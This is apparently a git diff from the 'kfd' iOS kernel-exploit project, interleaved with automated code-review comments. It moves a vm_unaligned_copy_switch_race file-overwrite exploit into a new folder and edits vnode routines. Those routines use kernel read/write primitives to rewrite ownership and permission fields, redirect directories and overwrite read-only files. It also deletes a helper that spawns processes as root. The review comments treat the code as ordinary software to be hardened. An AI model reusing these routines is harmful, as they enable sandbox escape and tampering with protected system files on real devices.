overwrite_data, size_t overwrite_length, bool unmapAtEnd) { bool retval = false; pthread_t th = NULL; int ret; diff --git a/kfd/fun/vm_unaligned_copy_switch_race.h b/kfd/overwrite/vm_unaligned_copy_switch_race.h similarity index 74% rename from kfd/fun/vm_unaligned_copy_switch_race.h rename to kfd/overwrite/vm_unaligned_copy_switch_race.h index 57471624..02eb696e 100644 --- a/kfd/fun/vm_unaligned_copy_switch_race.h +++ b/kfd/overwrite/vm_unaligned_copy_switch_race.h 
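Review bot: `HexDump` passes the result of `malloc(size)` straight to `kreadbuf` and then indexes it without checking for NULL; add `if (data == NULL) return;` after the allocation. In `sandbox_escape_can_i_access_file` the value returned by `getVnodeAtPathByChdir` goes to `createFolderAndRedirect` without the `vnode == -1` test that callers in `vnode.m` apply. `createFolderAndRedirect` also removes whatever already exists at `Documents/mounted` and discards every `NSFileManager` error (`error:nil`), so a failed directory creation is not noticed before the redirect. `UnRedirectAndRemoveFolder` always returns 0, which gives its `uint64_t` return type no meaning; `void` would be more honest.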
@@ -5,4 +5,4 @@ /// `page_to_overwrite` should be a page aligned `PROT_READ` `MAP_SHARED` region. `` /// `overwrite_length` must be less than or equal to `PAGE_SIZE`. /// Returns `true` if the overwrite succeeded, and `false` if the device is not vulnerable. -bool kfd_unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd); +bool unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd); diff --git a/kfd/fun/vnode.h b/kfd/overwrite/vnode.h similarity index 91% rename from kfd/fun/vnode.h rename to kfd/overwrite/vnode.h index d1300d64..6a571e6f 100644 --- a/kfd/fun/vnode.h +++ b/kfd/overwrite/vnode.h @@ -6,7 +6,6 @@ // #include -#import //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/mount.h#L293 #define MNT_RDONLY 0x00000001 /* read only filesystem */ @@ -22,16 +21,14 @@ #define FWRITE 0x00000002 uint64_t getVnodeAtPath(char* filename); /* return vnode of path, if open(filename, RD_ONLY) returned -1, it fails */ - uint64_t getVnodeAtPathByChdir(char *path); /* return vnode of path, but only directories work. NOT files. */ - uint64_t findRootVnode(void); /* return root vnode as is */ uint64_t getVnodeVar(void); /* return /var vnode as is */ uint64_t getVnodeVarMobile(void); /* return /var/mobile vnode as is */ uint64_t getVnodePreferences(void); /* return /var/mobile/Library/Preferences vnode as is */ uint64_t getVnodeLibrary(void); /* return /var/mobile/Library vnode as is */ uint64_t getVnodeSystemGroup(void); /* return /var/containers/Shared/SystemGroup vnode as is */ -uint64_t getVnodeCaches(void); /* returns caches vnode as is */ + /* Description: Hide file or directory. 
@@ -119,8 +116,3 @@ uint64_t findChildVnodeByVnode(uint64_t vnode, char* childname); https://openradar.appspot.com/FB8914231 */ uint64_t funVnodeOverwriteFileUnlimitSize(char* to, char* from); - -uint64_t funVnodeOverwriteFileUnlimitSizeWithVnode(uint64_t to_vnode, char* from); -uint64_t funVnodeChownFolder(char* filename, uid_t uid, gid_t gid); -uint64_t funVnodeChmodFolder(char* filename, mode_t mode); -uint64_t funVnodeFolderForFileManager(NSString* filename, uid_t uid, gid_t gid); diff --git a/kfd/fun/vnode.m b/kfd/overwrite/vnode.m similarity index 84% rename from kfd/fun/vnode.m rename to kfd/overwrite/vnode.m index 3f69f436..fef9a160 100644 --- a/kfd/fun/vnode.m +++ b/kfd/overwrite/vnode.m @@ -120,40 +120,6 @@ uint64_t funVnodeChown(char* filename, uid_t uid, gid_t gid) { return 0; } -uint64_t funVnodeChownFolder(char* filename, uid_t uid, gid_t gid) { - - uint64_t vnode = getVnodeAtPathByChdir(filename); - if(vnode == -1) { - printf("[-] Unable to get vnode, path: %s", filename); - return -1; - } - - uint64_t v_data = kread64(vnode + off_vnode_v_data); - uint32_t v_uid = kread32(v_data + 0x80); - uint32_t v_gid = kread32(v_data + 0x84); - - //vnode->v_data->uid - printf("[i] Patching %s vnode->v_uid %d -> %d\n", filename, v_uid, uid); - kwrite32(v_data+0x80, uid); - //vnode->v_data->gid - printf("[i] Patching %s vnode->v_gid %d -> %d\n", filename, v_gid, gid); - kwrite32(v_data+0x84, gid); - - struct stat file_stat; - if(stat(filename, &file_stat) == 0) { - printf("[+] %s UID: %d\n", filename, file_stat.st_uid); - printf("[+] %s GID: %d\n", filename, file_stat.st_gid); - } - - return 0; -} - -uint64_t funVnodeFolderForFileManager(NSString* filename, uid_t uid, gid_t gid) { - funVnodeRedirectFolder((char *) [filename UTF8String], (char *) [filename UTF8String]); - //funVnodeChownFolder((char *) [filename UTF8String], uid, gid); - return 0; -} - uint64_t funVnodeChmod(char* filename, mode_t mode) { uint64_t vnode = getVnodeAtPath(filename); if(vnode == -1) { 
@@ -175,27 +141,6 @@ uint64_t funVnodeChmod(char* filename, mode_t mode) { return 0; } -uint64_t funVnodeChmodFolder(char* filename, mode_t mode) { - uint64_t vnode = getVnodeAtPathByChdir(filename); - if(vnode == -1) { - printf("[-] Unable to get vnode, path: %s", filename); - return -1; - } - - uint64_t v_data = kread64(vnode + off_vnode_v_data); - uint32_t v_mode = kread32(v_data + 0x88); - - printf("[i] Patching %s vnode->v_mode %o -> %o\n", filename, v_mode, mode); - kwrite32(v_data+0x88, mode); - - struct stat file_stat; - if(stat(filename, &file_stat) == 0) { - printf("[+] %s mode: %o\n", filename, file_stat.st_mode); - } - - return 0; -} - uint64_t findRootVnode(void) { uint64_t launchd_proc = getProc(1); @@ -234,7 +179,7 @@ uint64_t findRootVnode(void) { } uint64_t funVnodeRedirectFolder(char* to, char* from) { - uint64_t to_vnode = getVnodeAtPath(to); + uint64_t to_vnode = getVnodeAtPathByChdir(to); if(to_vnode == -1) { printf("[-] Unable to get vnode, path: %s\n", to); return -1; @@ -245,7 +190,7 @@ uint64_t funVnodeRedirectFolder(char* to, char* from) { uint32_t to_v_kusecount = kread32(to_vnode + off_vnode_v_kusecount); uint64_t orig_to_v_data = kread64(to_vnode + off_vnode_v_data); - uint64_t from_vnode = getVnodeAtPath(from); + uint64_t from_vnode = getVnodeAtPathByChdir(from); if(from_vnode == -1) { printf("[-] Unable to get vnode, path: %s\n", from); return -1; @@ -272,10 +217,7 @@ uint64_t funVnodeRedirectFolder(char* to, char* from) { uint64_t funVnodeOverwriteFile(char* to, char* from) { int to_file_index = open(to, O_RDONLY); - if (to_file_index == -1) { - printf("\nto file nonexistent: %s\n", to); - return -1; - } + if (to_file_index == -1) return -1; off_t to_file_size = lseek(to_file_index, 0, SEEK_END); int from_file_index = open(from, O_RDONLY); 
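Review bot: `funVnodeRedirectFolder` now resolves both `to` and `from` through `getVnodeAtPathByChdir`, which the header in this same commit describes as working only for directories, but nothing at the function says callers may no longer pass a file path. A one-line comment above it would do, e.g. `/* both paths must be existing directories: resolved via getVnodeAtPathByChdir */`. The same substitution is made in `funVnodeRedirectFolderFromVnode` and `funVnodeUnRedirectFolder` further down, and the function bodies continue outside these hunks. If the lookup changes the process working directory, as the name suggests, that side effect is worth stating in the same comment; the helper's body is not visible here.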
@@ -417,31 +359,6 @@ uint64_t funVnodeIterateByVnode(uint64_t vnode) { return 0; } -uint64_t getVnodeCaches(void) { - - // var/mobile/Library/Caches/com.apple.keyboards - // 1 up, up to Caches - const char* path = "/var/mobile/Library/Caches/com.apple.keyboards"; - - uint64_t vnode = getVnodeAtPath(path); - if(vnode == -1) { - printf("[-] Unable to get vnode, path: %s\n", path); - sleep(0.1); - return -1; - } - - uint64_t parent_vnode = vnode; - parent_vnode = kread64(parent_vnode + off_vnode_v_parent) | 0xffffff8000000000; - - uint64_t vp_nameptr = kread64(parent_vnode + off_vnode_v_name); - char vp_name[16]; - do_kread(vp_nameptr, &vp_name, 16); - - printf("[i] vnode->v_name: %s\n", vp_name); - - return parent_vnode; -} - uint64_t getVnodeVar(void) { return getVnodeAtPathByChdir("/private/var"); } @@ -465,16 +382,9 @@ uint64_t getVnodeSystemGroup(void) { uint64_t findChildVnodeByVnode(uint64_t vnode, char* childname) { uint64_t vp_nameptr = kread64(vnode + off_vnode_v_name); uint64_t vp_name = kread64(vp_nameptr); - - char _vp_name[16]; - do_kread(vp_nameptr, &_vp_name, 16); - - printf("found named %s\n", _vp_name); - + uint64_t vp_namecache = kread64(vnode + off_vnode_v_ncchildren_tqh_first); - printf("vp_namecache: 0x%02llX", vp_namecache); - if(vp_namecache == 0) return 0; 
@@ -482,26 +392,25 @@ uint64_t findChildVnodeByVnode(uint64_t vnode, char* childname) { if(vp_namecache == 0) break; vnode = kread64(vp_namecache + off_namecache_nc_vp); - if(vnode == 0) break; vp_nameptr = kread64(vnode + off_vnode_v_name); - char vp_name[16]; - do_kread(vp_nameptr, &vp_name, 16); + char vp_name[256]; + kreadbuf(vp_nameptr, &vp_name, 256); +// printf("vp_name: %s\n", vp_name); - printf("%s\n", vp_name); usleep(50); - if(strcmp(vp_name, childname) == 0) { return vnode; } vp_namecache = kread64(vp_namecache + off_namecache_nc_child_tqe_prev); } + return 0; } uint64_t funVnodeRedirectFolderFromVnode(char* to, uint64_t from_vnode) { - uint64_t to_vnode = getVnodeAtPath(to); + uint64_t to_vnode = getVnodeAtPathByChdir(to); if(to_vnode == -1) { printf("[-] Unable to get vnode, path: %s\n", to); return -1; @@ -531,7 +440,7 @@ uint64_t funVnodeRedirectFolderFromVnode(char* to, uint64_t from_vnode) { } uint64_t funVnodeUnRedirectFolder (char* to, uint64_t orig_to_v_data) { - uint64_t to_vnode = getVnodeAtPath(to); + uint64_t to_vnode = getVnodeAtPathByChdir(to); if(to_vnode == -1) { printf("[-] Unable to get vnode, path: %s\n", to); return -1; @@ -556,10 +465,7 @@ uint64_t funVnodeUnRedirectFolder (char* to, uint64_t orig_to_v_data) { uint64_t funVnodeOverwriteFileUnlimitSize(char* to, char* from) { int to_file_index = open(to, O_RDONLY); - if (to_file_index == -1) { - printf("to file nonexistent\n"); - return -1; - } + if (to_file_index == -1) return -1; int from_file_index = open(from, O_RDONLY); if (from_file_index == -1) return -1; @@ -596,7 +502,7 @@ uint64_t funVnodeOverwriteFileUnlimitSize(char* to, char* from) { } printf("[i] ftruncate ret: %d\n", ftruncate(to_file_index, 0)); - printf("[i] write: %zd\n", write(to_file_index, from_mapped, from_file_size)); + printf("[i] write ret: %zd\n", write(to_file_index, from_mapped, from_file_size)); munmap(from_mapped, from_file_size); 
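Review bot: `vp_name` is filled with a fixed 256-byte `kreadbuf` and then passed to `strcmp` with no guarantee of a terminating NUL, so a name that fills the buffer lets `strcmp` read past the end of the stack array. Terminate it explicitly after the read: `vp_name[sizeof(vp_name) - 1] = '\0';`. Using `sizeof(vp_name)` for the length argument as well keeps the two 256s from drifting apart. The loop in `findChildVnodeByVnode` starts outside the hunk.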
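Review bot: In `funVnodeOverwriteFileUnlimitSize` the early `return -1` after the second `open` leaves `to_file_index` open, so every failed call leaks a descriptor; the shortened check added here keeps that path. Close it first: `if (from_file_index == -1) { close(to_file_index); return -1; }`. With the message removed the two failures are also indistinguishable to the caller, since both return `-1` silently. `funVnodeOverwriteFile` opens its files in the same order in the hunk at -272, though its failure path is outside that hunk.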
diff --git a/kfd/test.swift b/kfd/test.swift
deleted file mode 100644
index c1584bdf..00000000
--- a/kfd/test.swift
+++ /dev/null
@@ -1,40 +0,0 @@
-//
-// test.swift
-// kfd
-//
-// Created by LL on 27/7/23.
-//
-
-import SwiftUtils
-
-public func execCmd(args: [String], fileActions: posix_spawn_file_actions_t? = nil) -> Int32? {
- var fileActions = fileActions
-
- var attr: posix_spawnattr_t?
- posix_spawnattr_init(&attr)
- posix_spawnattr_set_persona_np(&attr, 99, 1)
- posix_spawnattr_set_persona_uid_np(&attr, 0)
- posix_spawnattr_set_persona_gid_np(&attr, 0)
-
- var pid: pid_t = 0
- var argv: [UnsafeMutablePointer?] = []
- for arg in args {
- argv.append(strdup(arg))
- }
-
- argv.append(nil)
-
- let result = posix_spawn(&pid, argv[0], &fileActions, &attr, &argv, environ)
- let err = errno
- guard result == 0 else {
- NSLog("Failed")
- NSLog("Error: \(result) Errno: \(err)")
-
- return nil
- }
-
- var status: Int32 = 0
- waitpid(pid, &status, 0)
-
- return status
-}